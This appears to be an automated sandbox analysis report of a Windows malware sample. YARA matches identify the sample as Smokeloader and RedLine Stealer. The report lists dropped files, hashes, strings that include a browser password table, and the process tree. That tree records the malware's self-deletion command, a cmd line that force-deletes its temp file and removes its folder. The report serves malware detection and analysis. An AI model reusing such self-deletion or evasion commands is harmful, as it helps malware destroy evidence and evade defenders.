Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D12C000	12_2_6D12C000
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0AE070	12_2_6D0AE070
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D058090	12_2_6D058090
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13C0B0	12_2_6D13C0B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0700B0	12_2_6D0700B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0D2320	12_2_6D0D2320
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D068340	12_2_6D068340
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A2370	12_2_6D1A2370
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D062370	12_2_6D062370
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D17C360	12_2_6D17C360
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F6370	12_2_6D0F6370
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0923A0	12_2_6D0923A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0BE3B0	12_2_6D0BE3B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0B43E0	12_2_6D0B43E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D12A210	12_2_6D12A210
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D138220	12_2_6D138220
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F8250	12_2_6D0F8250
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0E8260	12_2_6D0E8260
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D12E2B0	12_2_6D12E2B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1322A0	12_2_6D1322A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1E62C0	12_2_6D1E62C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C3D00	12_2_6D0C3D00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D053D80	12_2_6D053D80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A9D90	12_2_6D1A9D90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D131DC0	12_2_6D131DC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D071C30	12_2_6D071C30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D063C40	12_2_6D063C40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D189C40	12_2_6D189C40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FFC80	12_2_6D0FFC80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D19DCD0	12_2_6D19DCD0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D121CE0	12_2_6D121CE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D095F20	12_2_6D095F20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D055F30	12_2_6D055F30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1B7F20	12_2_6D1B7F20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D081F90	12_2_6D081F90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D17DFC0	12_2_6D17DFC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1E3FC0	12_2_6D1E3FC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D10BFF0	12_2_6D10BFF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D16DE10	12_2_6D16DE10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1BBE70	12_2_6D1BBE70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1E5E60	12_2_6D1E5E60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D083EC0	12_2_6D083EC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1AF900	12_2_6D1AF900
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D115920	12_2_6D115920
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0DF960	12_2_6D0DF960
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D11D960	12_2_6D11D960
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D131990	12_2_6D131990
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D071980	12_2_6D071980
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F99C0	12_2_6D0F99C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0999D0	12_2_6D0999D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C59F0	12_2_6D0C59F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F79F0	12_2_6D0F79F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0BD810	12_2_6D0BD810
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FF8C0	12_2_6D0FF8C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13F8F0	12_2_6D13F8F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D06D8E0	12_2_6D06D8E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0938E0	12_2_6D0938E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1BB8F0	12_2_6D1BB8F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0ABB20	12_2_6D0ABB20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13FB60	12_2_6D13FB60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D145B90	12_2_6D145B90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D051B80	12_2_6D051B80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D129BB0	12_2_6D129BB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0B9BA0	12_2_6D0B9BA0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0A7BF0	12_2_6D0A7BF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D101A10	12_2_6D101A10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D09FA10	12_2_6D09FA10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D15DA30	12_2_6D15DA30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1E9A50	12_2_6D1E9A50
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13DAB0	12_2_6D13DAB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D061AE0	12_2_6D061AE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1AF510	12_2_6D1AF510
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C7500	12_2_6D0C7500
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D075510	12_2_6D075510
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D099590	12_2_6D099590
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0E55F0	12_2_6D0E55F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0ED410	12_2_6D0ED410
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D149430	12_2_6D149430

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\FBGIDHCAAKEB\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D1ED930 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D199F30 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D1EDAE0 appears 75 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D083620 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D1E09D0 appears 317 times
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: String function: 6D089B10 appears 103 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: String function: 004087A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: String function: 0040F5A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: String function: 02128A07 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: String function: 0212F807 appears 139 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468

Uses 32bit PE files

Source: xvJv1BpknZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@14/36@11/10

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D0C0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

12_2_6D0C0300

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

Code function: 0_2_0215614A CreateToolhelp32Snapshot,Module32First,

0_2_0215614A

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_0042B20E CoCreateInstance,

7_2_0042B20E

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\etrtabd

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7992
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\5876.tmp

Jump to behavior

Source: xvJv1BpknZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\EE6.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.12.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.12.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.12.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.12.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.12.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.12.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.12.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: katDDA4.tmp, katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.12.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: 5876.exe, 00000007.00000003.1760839883.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1744609509.0000000002C75000.00000004.00000800.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1743544115.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2250873454.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2250873454.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2233073953.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, GIEBAE.12.dr, BFIIID.12.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.12.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.12.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: xvJv1BpknZ.exe

Virustotal: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\xvJv1BpknZ.exe "C:\Users\user\Desktop\xvJv1BpknZ.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\etrtabd C:\Users\user\AppData\Roaming\etrtabd
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5876.exe C:\Users\user\AppData\Local\Temp\5876.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EE6.exe C:\Users\user\AppData\Local\Temp\EE6.exe
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Process created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5876.exe C:\Users\user\AppData\Local\Temp\5876.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EE6.exe C:\Users\user\AppData\Local\Temp\EE6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Process created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Jump to behavior
